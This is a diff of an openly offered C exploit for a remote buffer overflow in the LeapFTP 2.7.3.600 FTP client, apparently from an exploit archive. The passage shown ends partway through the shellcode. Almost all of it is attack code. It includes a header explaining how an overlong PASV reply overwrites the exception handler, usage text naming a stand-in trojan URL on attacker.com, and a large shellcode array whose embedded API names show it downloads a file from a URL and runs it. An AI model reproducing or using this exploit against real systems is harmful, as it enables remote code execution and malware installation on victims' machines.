 # milw0rm.com [2008-03-26]
diff --git a/platforms/windows/remote/54.c b/platforms/windows/remote/54.c
index 8a0454d9c..98ecc952a 100755
--- a/platforms/windows/remote/54.c
+++ b/platforms/windows/remote/54.c
@@ -1,7 +1,7 @@
 /*
 ,----------------------------------------------------
 ;     LeapFTP remote buffer overflow exploit     
-;              by drG4njubas \\\\ DWC Group
+;              by drG4njubas \\ DWC Group
 `----------------------------------------------------
 ,----------------------------------------------------
 ;This exploit works against LeapFTP 2.7.3.600
@@ -9,7 +9,7 @@
 ;Technical details: When LeapFTP requests IP 
 ;and port by using PASV command if pasv mode 
 ;is enabled, it causes the buffer overflow on
-;the stack area if server\'s reply for this 
+;the stack area if server's reply for this 
 ;PASV request has a long IP address: 
 ;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
 ;And this buffer overflow can overwrite a 
@@ -19,7 +19,7 @@
 ;reply contains 0x29 and 0x2E bytes, an 
 ;exception occurs before Structured Exception
 ;Handler is overvritten and program continues
-;it\'s normal work. Thanks a lot to RaiSe for 
+;it's normal work. Thanks a lot to RaiSe for 
 ;his wonderful shellcode.
 `----------------------------------------------------
 */
@@ -29,109 +29,109 @@
 
 void main(int argc, char *argv[]){
 
-printf(\",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\\n\");
-printf(\";LeapFTP 2.7.3.600 remote buffer overflow exploit;\\n\");
-printf(\"; Coded by drG4njubas \\\\\\\\ DWC Security Group ;\\n\");
-printf(\"; www.dwcgr0up.net ;\\n\");
-printf(\"\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\\n\");
+printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n");
+printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
+printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
+printf("; www.dwcgr0up.net ;\n");
+printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n");
 
 if(argc < 3){
-printf(\"USAGE : dwclft273.exe <port> <trojan url>\\n\");
-printf(\"EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\\n\");
+printf("USAGE : dwclft273.exe <port> <trojan url>\n");
+printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
 return;
 }
 
 char exploit[] =
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x30\\x5F\\xFC\\x8B\\xF7\\x80\"
-\"\\x3F\\x08\\x75\\x03\\x80\\x37\\x08\\x47\\x80\\x3F\\x01\\x75\\xF2\\x8B\\xE6\\x33\\xD2\\xB2\\x04\\xC1\"
-\"\\xE2\\x08\\x2B\\xE2\\x8B\\xEC\\x33\\xD2\\xB2\\x03\\xC1\\xE2\\x08\\x2B\\xE2\\x54\\x5A\\xB2\\x7C\\x8B\"
-\"\\xE2\\xEB\\x02\\xEB\\x57\\x89\\x75\\xFC\\x33\\xC0\\xB4\\x40\\xC1\\xE0\\x08\\x89\\x45\\xF8\\x8B\\x40\"
-\"\\x3C\\x03\\x45\\xF8\\x8D\\x40\\x7E\\x8B\\x40\\x02\\x03\\x45\\xF8\\x8B\\xF8\\x8B\\x7F\\x0C\\x03\\x7D\"
-\"\\xF8\\x81\\x3F\\x4B\\x45\\x52\\x4E\\x74\\x07\\x83\\xC0\\x14\\x8B\\xF8\\xEB\\xEB\\x50\\x8B\\xF8\\x33\"
-\"\\xC9\\x33\\xC0\\xB1\\x10\\x8B\\x17\\x03\\x55\\xF8\\x52\\xEB\\x03\\x57\\x8B\\xD7\\x80\\x7A\\x03\\x80\"
-\"\\x74\\x16\\x8B\\x32\\x03\\x75\\xF8\\x83\\xC6\\x02\\xEB\\x02\\xEB\\x7E\\x8B\\x7D\\xFC\\x51\\xF3\\xA6\"
-\"\\x59\\x5F\\x74\\x06\\x40\\x83\\xC7\\x04\\xEB\\xDB\\x5F\\x8B\\x7F\\x10\\x03\\x7D\\xF8\\xC1\\xE0\\x02\"
-\"\\x03\\xF8\\x8B\\x07\\x8B\\x5D\\xFC\\x8D\\x5B\\x11\\x53\\xFF\\xD0\\x89\\x45\\xF4\\x8B\\x40\\x3C\\x03\"
-\"\\x45\\xF4\\x8B\\x70\\x78\\x03\\x75\\xF4\\x8D\\x76\\x1C\\xAD\\x03\\x45\\xF4\\x89\\x45\\xF0\\xAD\\x03\"
-\"\\x45\\xF4\\x89\\x45\\xEC\\xAD\\x03\\x45\\xF4\\x89\\x45\\xE8\\x8B\\x55\\xEC\\x8B\\x75\\xFC\\x8D\\x76\"
-\"\\x1E\\x33\\xDB\\x33\\xC9\\xB1\\x0F\\x8B\\x3A\\x03\\x7D\\xF4\\x56\\x51\\xF3\\xA6\\x59\\x5E\\x74\\x06\"
-\"\\x43\\x8D\\x52\\x04\\xEB\\xED\\xD1\\xE3\\x8B\\x75\\xE8\\x03\\xF3\\x33\\xC9\\x66\\x8B\\x0E\\xEB\\x02\"
-\"\\xEB\\x7D\\xC1\\xE1\\x02\\x03\\x4D\\xF0\\x8B\\x09\\x03\\x4D\\xF4\\x89\\x4D\\xE4\\x8B\\x5D\\xFC\\x8D\"
-\"\\x5B\\x2D\\x33\\xC9\\xB1\\x07\\x8D\\x7D\\xE0\\x53\\x51\\x53\\x8B\\x55\\xF4\\x52\\x8B\\x45\\xE4\\xFC\"
-\"\\xFF\\xD0\\x59\\x5B\\xFD\\xAB\\x8D\\x64\\x24\\xF8\\x38\\x2B\\x74\\x03\\x43\\xEB\\xF9\\x43\\xE2\\xE1\"
-\"\\x8B\\x45\\xE0\\x53\\xFC\\xFF\\xD0\\xFD\\xAB\\x33\\xC9\\xB1\\x04\\x8D\\x5B\\x0C\\xFC\\x53\\x51\\x53\"
-\"\\x8B\\x55\\xC4\\x52\\x8B\\x45\\xE4\\xFF\\xD0\\x59\\x5B\\xFD\\xAB\\x38\\x2B\\x74\\x03\\x43\\xEB\\xF9\"
-\"\\x43\\xE2\\xE5\\xFC\\x33\\xD2\\xB6\\x1F\\xC1\\xE2\\x08\\x52\\x33\\xD2\\x52\\x8B\\x45\\xD4\\xFF\\xD0\"
-\"\\x89\\x45\\xB0\\x33\\xD2\\xEB\\x02\\xEB\\x77\\x52\\x52\\x52\\x52\\x53\\x8B\\x45\\xC0\\xFF\\xD0\\x8D\"
-\"\\x5B\\x03\\x89\\x45\\xAC\\x33\\xD2\\x52\\xB6\\x80\\xC1\\xE2\\x10\\x52\\x33\\xD2\\x52\\x52\\x8D\\x7B\"
-\"\\x09\\x57\\x50\\x8B\\x45\\xBC\\xFF\\xD0\\x89\\x45\\xA8\\x8D\\x55\\xA0\\x52\\x33\\xD2\\xB6\\x1F\\xC1\"
-\"\\xE2\\x08\\x52\\x8B\\x4D\\xB0\\x51\\x50\\x8B\\x45\\xB8\\xFF\\xD0\\x8B\\x4D\\xA8\\x51\\x8B\\x45\\xB4\"
-\"\\xFF\\xD0\\x8B\\x4D\\xAC\\x51\\x8B\\x45\\xB4\\xFF\\xD0\\x33\\xD2\\x52\\x53\\x8B\\x45\\xDC\\xFF\\xD0\"
-\"\\x89\\x45\\xA4\\x8B\\x7D\\xA0\\x57\\x8B\\x55\\xB0\\x52\\x50\\x8B\\x45\\xD8\\xFF\\xD0\\x8B\\x55\\xA4\"
-\"\\x52\\x8B\\x45\\xD0\\xFF\\xD0\\xEB\\x02\\xEB\\x12\\x33\\xD2\\x90\\x52\\x53\\x8B\\x45\\xCC\\xFF\\xD0\"
-\"\\x33\\xD2\\x52\\x8B\\x45\\xC8\\xFF\\xD0\\xE8\\xE6\\xFD\\xFF\\xFF\\x47\\x65\\x74\\x4D\\x6F\\x64\\x75\"
-\"\\x6C\\x65\\x48\\x61\\x6E\\x64\\x6C\\x65\\x41\\x08\\x6B\\x65\\x72\\x6E\\x65\\x6C\\x33\\x32\\x2d\\x64\"
-\"\\x6C\\x6C\\x08\\x47\\x65\\x74\\x50\\x72\\x6F\\x63\\x41\\x64\\x64\\x72\\x65\\x73\\x73\\x08\\x4C\\x6F\"
-\"\\x61\\x64\\x4C\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x08\\x5F\\x6C\\x63\\x72\\x65\\x61\\x74\\x08\\x5F\"
-\"\\x6C\\x77\\x72\\x69\\x74\\x65\\x08\\x47\\x6C\\x6F\\x62\\x61\\x6C\\x41\\x6C\\x6C\\x6F\\x63\\x08\\x5F\"
-\"\\x6C\\x63\\x6C\\x6F\\x73\\x65\\x08\\x57\\x69\\x6E\\x45\\x78\\x65\\x63\\x08\\x45\\x78\\x69\\x74\\x50\"
-\"\\x72\\x6F\\x63\\x65\\x73\\x73\\x08\\x77\\x69\\x6E\\x69\\x6E\\x65\\x74\\x2d\\x64\\x6C\\x6C\\x08\\x49\"
-\"\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x4F\\x70\\x65\\x6E\\x41\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\"
-\"\\x74\\x4F\\x70\\x65\\x6E\\x55\\x72\\x6C\\x41\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x52\\x65\"
-\"\\x61\\x64\\x46\\x69\\x6C\\x65\\x08\\x49\\x6E\\x74\\x65\\x72\\x6E\\x65\\x74\\x43\\x6C\\x6F\\x73\\x65\"
-\"\\x48\\x61\\x6E\\x64\\x6C\\x65\\x08\\x4E\\x53\\x08\\x6E\\x73\\x73\\x63\\x2d\\x65\\x78\\x65\\x08\\x68\"
-\"\\x74\\x74\\x70\\x3A\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
-\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
-\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
-\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\"
-\"\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x93\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x25\\x49\\xE1\"
-\"\\x77\\x90\\x90\\x90\\x90\\xFE\\x83\\x75\\xFE\\xFF\\xFF\\xFE\\x83\\xD5\\xFE\\xFF\\xFF\\xFE\\x83\\x25\"
-\"\\xFF\\xFF\\xFF\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-\"\\x80\\xAB\\x2F\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x30\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x31\\xFF\\xFF\\xFF\"
-\"\\x03\\x80\\xAB\\x32\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x33\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x34\\xFF\\xFF\"
-\"\\xFF\\x03\\x80\\xAB\\x35\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x36\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x37\\xFF\"
-\"\\xFF\\xFF\\x03\\x80\\xAB\\x38\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x39\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3A\"
-\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3B\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
-\"\\x3D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3E\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x3F\\xFF\\xFF\\xFF\\x03\\x80\"
-\"\\xAB\\x40\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x41\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x42\\xFF\\xFF\\xFF\\x03\"
-\"\\x80\\xAB\\x43\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x44\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x45\\xFF\\xFF\\xFF\"
-\"\\x03\\x80\\xAB\\x46\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x47\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x48\\xFF\\xFF\"
-\"\\xFF\\x03\\x80\\xAB\\x49\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4A\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4B\\xFF\"
-\"\\xFF\\xFF\\x03\\x80\\xAB\\x4C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4E\"
-\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x4F\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x50\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
-\"\\x51\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x52\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x53\\xFF\\xFF\\xFF\\x03\\x80\"
-\"\\xAB\\x54\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x55\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x56\\xFF\\xFF\\xFF\\x03\"
-\"\\x80\\xAB\\x57\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x58\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x59\\xFF\\xFF\\xFF\"
-\"\\x03\\x80\\xAB\\x5A\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5B\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5C\\xFF\\xFF\"
-\"\\xFF\\x03\\x80\\xAB\\x5D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5E\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x5F\\xFF\"
-\"\\xFF\\xFF\\x03\\x80\\xAB\\x60\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x61\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x62\"
-\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x63\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x64\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
-\"\\x65\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x66\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x67\\xFF\\xFF\\xFF\\x03\\x80\"
-\"\\xAB\\x68\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x69\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6A\\xFF\\xFF\\xFF\\x03\"
-\"\\x80\\xAB\\x6B\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6D\\xFF\\xFF\\xFF\"
-\"\\x03\\x80\\xAB\\x6E\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x6F\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x70\\xFF\\xFF\"
-\"\\xFF\\x03\\x80\\xAB\\x71\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x72\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x73\\xFF\"
-\"\\xFF\\xFF\\x03\\x80\\xAB\\x74\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x75\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x76\"
-\"\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x77\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x78\\xFF\\xFF\\xFF\\x03\\x80\\xAB\"
-\"\\x79\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7A\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7B\\xFF\\xFF\\xFF\\x03\\x80\"
-\"\\xAB\\x7C\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7D\\xFF\\xFF\\xFF\\x03\\x80\\xAB\\x7E\\xFF\\xFF\\xFF\\x03\"
-\"\\x80\\xAB\\x7F\\xFF\\xFF\\xFF\\x03\\x80\\x6B\\x80\\x03\\x80\\x6B\\x81\\x03\\x80\\x6B\\x82\\x03\\x90\"
-\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xE9\\x61\\xF9\\xFF\\xFF\";
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80"
+"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
+"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
+"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
+"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
+"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
+"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
+"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
+"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
+"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
+"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
+"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
+"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
+"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
+"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
+"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
+"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
+"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
+"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
+"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
+"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
+"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
+"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
+"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
+"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
+"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
+"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
+"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
+"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2d\x64"
+"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
+"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
+"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
+"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
+"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C\x08\x49"
+"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
+"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
+"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
+"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65\x08\x68"
+"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
+"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
+"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
+"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
+"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25\x49\xE1"
+"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE\x83\x25"
+"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x31\xFF\xFF\xFF"
+"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34\xFF\xFF"
+"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB\x37\xFF"
+"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80\xAB\x3A"
+"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03\x80\xAB"
+"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF\x03\x80"
+"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF\xFF\x03"
+"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF\xFF\xFF"
+"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48\xFF\xFF"
+"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB\x4B\xFF"
+"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
+"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03\x80\xAB"
+"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF\x03\x80"
+"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF\xFF\x03"
+"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF\xFF\xFF"
+"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C\xFF\xFF"
+"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB\x5F\xFF"
+"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\xFF\xFF\xFF\x03\x80\xAB\x62"
+"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03\x80\xAB"
+"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF\x03\x80"
+"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF\xFF\x03"
+"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF\xFF\xFF"
+"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70\xFF\xFF"
